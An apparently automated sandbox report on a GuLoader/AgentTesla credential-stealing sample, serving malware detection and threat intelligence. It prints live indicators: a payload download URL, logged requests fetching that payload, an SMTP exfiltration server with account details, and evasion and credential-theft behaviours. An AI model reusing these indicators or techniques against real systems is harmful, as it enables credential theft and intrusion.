Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
Analysis ID: 659406
MD5: 6164a2f75a0c585d3256faecac344573
SHA1: 684171a971270ecef4e56293f7808e5989989d1d
SHA256: c5e737000bb35f513800bfa5a9efd5c43a5771f1ae77fe4d4284a25111d4f9c8
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Drops certificate files (DER)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe (PID: 8772 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" MD5: 6164A2F75A0C585D3256FAECAC344573)
    • CasPol.exe (PID: 3216 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 4372 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "gonzalez@gonzalezestalote.comGonzalezBeba35mail.gonzalezestalote.comslims4417@gmail.com"}
{"Payload URL": "https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL_n"}
| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | |
| 00000004.00000000.900199931.0000000001390000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security | |
| 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
| 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| Process Memory Space: CasPol.exe PID: 4372 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |

No Sigma rule has matched
No Snort rule has matched

            AV Detection

            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeReversingLabs: Detection: 21%
            Source: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL_n"}
            Source: CasPol.exe.4372.4.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gonzalez@gonzalezestalote.comGonzalezBeba35mail.gonzalezestalote.comslims4417@gmail.com"}
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 142.250.186.78:443 -> 192.168.11.20:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.11.20:49738 version: TLS 1.2
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\BorgerdyderneJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\Husvildt\Eliteidrt\RemodifiedJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLINGJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile opened: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmpJump to behavior

            Networking

            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL_n
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 185.101.224.45 185.101.224.45
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-0s-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49749 -> 185.101.224.45:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5752554235.000000001DC30000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5752986004.000000001DC53000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753308693.000000001DC7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://HtsTzf40dpytHYvq.org
            Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://HtsTzf40dpytHYvq.org0=5
            Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://HtsTzf40dpytHYvq.orgt-
            Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://UUaKae.com
            Source: CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: folder-saved-search.png.0.drString found in binary or memory: http://creativecommons.org/licenses/by-sa/4.0/
            Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000004.00000002.5759212580.000000001FC40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: CasPol.exe, 00000004.00000002.5759212580.000000001FC40000.00000004.00000800.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?83e7b5459006f
            Source: CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?83e7b54590
            Source: CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gonzalezestalote.com
            Source: CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.gonzalezestalote.com
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
            Source: CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: CasPol.exe, 00000004.00000002.5763767522.0000000020BD5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: CasPol.exe, 00000004.00000003.1221555927.000000001FD0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1221139150.000000001FD06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1228880026.000000001FD08000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1214700054.000000001FD06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1215152524.000000001FD0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1226299470.000000001FD07000.00000004.00000800.00020000.00000000.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.4.drString found in binary or memory: http://x1.i.lencr.org/
            Source: CasPol.exe, 00000004.00000002.5763767522.0000000020BD5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org:80/
            Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
            Source: CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0k-0s-docs.googleusercontent.com/
            Source: CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0k-0s-docs.googleusercontent.com/C
            Source: CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728150845.0000000001635000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-0k-0s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27na
            Source: CasPol.exe, 00000004.00000002.5727597046.0000000001616000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/#
            Source: CasPol.exe, 00000004.00000002.5727597046.0000000001616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL
            Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3DJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AD3ECE LoadLibraryA,NtAllocateVirtualMemory,0_2_02AD3ECE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AD6648 NtResumeThread,0_2_02AD6648
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AD5FDA NtProtectVirtualMemory,0_2_02AD5FDA
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeJump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\UndertegnelseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile created: C:\Users\user\AppData\Local\Temp\nsnA919.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/11@4/3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara matchFile source: 00000000.00000002.1104819346.0000000002AC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.900199931.0000000001390000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_70B230C0 push eax; ret 0_2_70B230EE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AC7E28 push cs; ret 0_2_02AC7EAD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AC7E50 push cs; ret 0_2_02AC7EAD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AC53D4 push ebx; iretd 0_2_02AC53D5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AC20E7 push cs; retf 0_2_02AC2120
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_02AC218F push cs; retf 0_2_02AC2120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012A2570 push esp; retf 1FDCh4_2_012A27C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_012A84BF push edi; retn 0000h4_2_012A84C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_1DA15DD3 push ds; ret 4_2_1DA15E83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_20AD718D pushad ; retf 4_2_20AD7199
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeCode function: 0_2_70B21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70B21BFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile created: C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\UndertegnelseJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
